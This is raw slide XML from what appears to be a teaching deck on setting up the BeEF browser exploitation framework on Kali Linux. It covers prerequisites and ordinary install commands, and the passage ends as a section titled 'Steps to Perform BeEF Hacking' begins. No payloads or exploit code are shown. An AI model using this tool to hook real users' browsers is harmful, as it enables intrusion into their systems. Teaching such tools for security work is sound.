            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>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Installation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41DB07DB-AD4E-5F90-56A7-C5FA67A215BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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6E8032B-9A1F-C319-5C2C-3279272C1DFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="1355592"/>
            <a:ext cx="6096000" cy="2515240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15240" indent="-6350">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F5496"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Pre-requisites</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2F5496"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="3175" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>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Have Ruby Installed (version 2.5 or newer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="3175" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Have Node.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> (10 or newer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="3175" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>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Have SQLite.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="3175" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>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Have the gems listed in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Gem file</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3175" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>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rPr>
              <a:t>Have Mac OSX 10.5.0 or higher (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>modern Linux)</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E85773D0-99E9-3CA2-BDC8-A6FA5E38D648}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="3979440"/>
            <a:ext cx="6096000"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Install SQLite</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{272CE7A7-D30E-6A64-EF91-9EC275FB82A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3227294" y="5690426"/>
            <a:ext cx="6096000" cy="374974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="l">
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> apt-get install sqlite3</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5F454DA9-EEAC-0EF2-8FF9-546113FB6774}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1201270" y="4981822"/>
            <a:ext cx="6096000"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Command:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4169D8CA-500C-8815-6ABB-7A8F5B8A8978}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2958353" y="5717697"/>
            <a:ext cx="4706471" cy="320432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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5E50FE69-F3A6-9CD5-E114-001E40639B68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1201270" y="4497841"/>
            <a:ext cx="6096000"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It comes pre-installed on Kali Linux.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Date Placeholder 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53E5A34F-1BAD-C2D3-A2E0-6DC112A52548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FF7B47F6-904E-4EDB-A779-92D9DCB7267A}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Slide Number Placeholder 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A931C7D0-FB5A-8D55-347E-0DC5B2D0424C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>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43358B-E2B6-CC39-FB5D-99BED32723FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04E9F5D8-599E-453A-AC42-FF6CB32BD6AA}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 10:27 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62FBCDF8-3D1F-A331-8DFA-89B53145E619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12BA5D9F-56A0-4011-9036-BF8C8B423D7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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FB3A89FB-45EB-EEF8-BA9D-07D45EF6693C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="672353" y="422199"/>
            <a:ext cx="11098306" cy="1287660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Install Ruby</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ruby is an open-source and dynamic programming language which is focused on simplicity. It is installed by default on Linux. But in case you find it missing you can install it by running the below command.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C43B6B-31DA-FB12-DDCC-7873822FD99A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3116980" y="1973511"/>
            <a:ext cx="6096000"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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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apt-get install ruby-full</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="10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2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9D6CA98C-6BBD-B11A-877B-30B2127DB8AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797857" y="2877538"/>
            <a:ext cx="10919011" cy="1703159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Gemfiles</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Gems are ruby files used to extend its applications functionalities. They contain re-usable functions shared among Ruby users. We will install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>gemfiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> using bundler since it makes it easier to install many gems in a single command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>We open a terminal window and run below command to install bundler.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ADB592F-BBCB-04D8-E94E-5A910A36D263}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2814918" y="5006859"/>
            <a:ext cx="6096000" cy="923330"/>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gem install bundler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bundle install</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git add </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="18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Gemfile</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="18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18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Gemfile.lock</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="105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B475814D-A8EA-7F68-8C4C-2FCDA8AFE972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3811744" y="1957635"/>
            <a:ext cx="4706471" cy="320432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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0901F4B1-7F4C-834B-8779-9ECDF22C9734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3621739" y="5065213"/>
            <a:ext cx="4706471" cy="864975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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2460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5BAA-5354-F7A3-EF54-A83F5D1C796E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steps to Perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{186FA214-D4AF-0646-6153-6B38C4A35F8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="1407022"/>
            <a:ext cx="6096000" cy="458074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Step 1: Installing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>BeEF</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29F02820-A9F9-599C-9C70-7F5744E1F358}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="2009926"/>
            <a:ext cx="10360959" cy="1703159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> does not come pre-installed on newer versions of Kali Linux (from version 2019.3) but if you update an older version of Kali Linux, you will not lose the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>BEeF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> framework. But you have to make sure to use “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
